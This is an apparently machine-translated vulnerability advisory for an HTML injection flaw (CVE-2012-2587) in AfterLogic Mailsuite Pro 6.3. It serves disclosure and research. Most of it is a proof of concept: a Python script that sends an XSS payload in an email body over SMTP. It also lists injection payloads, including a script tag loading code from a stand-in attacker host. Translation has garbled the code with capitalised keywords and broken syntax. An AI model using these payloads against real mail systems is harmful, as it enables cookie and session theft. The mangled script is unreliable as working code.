AfterLogic Mailsuite Pro 'body' field HTML Injection Vulnerability

Release date:
Updated on:

Affected Systems:
AfterLogic MailBee Objects 6.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54906
Cve id: CVE-2012-2587

AfterLogic Mailsuite Pro is a message delivery solution for Linux, includes email server, AJAX-based Web mail client, spam and virus protection, Web-based management panel, calendar, contacts, etc.

Mailsuite Pro 6.3 and other versions have the HTML injection vulnerability. Attackers can provide HTML or JS Code to run on the affected site, steal Cookie authentication creden。, or control the site appearance.

<* Source: loneferret
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Loneferret () provides the following test methods:

#! /Usr/bin/python

'''

Author: loneferret of Offensive Security
Product: AfterLogic Mailsuite Pro (VMware Appliance)
Version: 6.3
Vendor Site: http://www.afterlogic.com/
Software Download: http://www.afterlogic.com/download/

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received ed from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure

Installed On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9
Client Test OS: Window XP Pro SP3 (x86)
Browser Used: Internet Explorer 8
Client Test OS: mac OS Lion
Browser Used: Firefox 12

Injection Point: Body
Injection Payload (s ):
1: <iframe src = "javascript: alert ('xss');"> </IFRAME>
2: <script src = // attacker/. j>
3: <iframe src = "javascript: alert ('xss');"> </IFRAME>

'''

Import smtplib, urllib2

Payload = "<iframe src =" javascript: alert ('xss'); "> </IFRAME> """

Def sendMail (dstemail, frmemail, smtpsrv, username, password ):
Msg = "From: hacker@offsec.local \ n"
Msg + = "To: victim@victim.local \ n"
Msg + = 'date: Today \ r \ N'
Msg + = "Subject: XSS \ n"
Msg + = "Content-type: text/html \ n"
Msg + = "XSS" + payload + "\ r \ n"
Server = smtplib. SMTP (smtpsrv)
Server. login (username, password)
Try:
Server. sendmail (frmemail, dstemail, msg)
Except t Exception, e:
Print "[-] Failed to send email :"
Print "[*]" + str (e)
Server. quit ()

Username = "hacker@offsec.local"
Password = "123456"
Dstemail = "victim@victim.local"
Frmemail = "hacker@offsec.local"
Smtpsrv = "172.16.84.171"

Print "[*] Sending Email"
SendMail (dstemail, frmemail, smtpsrv, username, password)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

AfterLogic
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.afterlogic.com/mailsuite/linux-email-server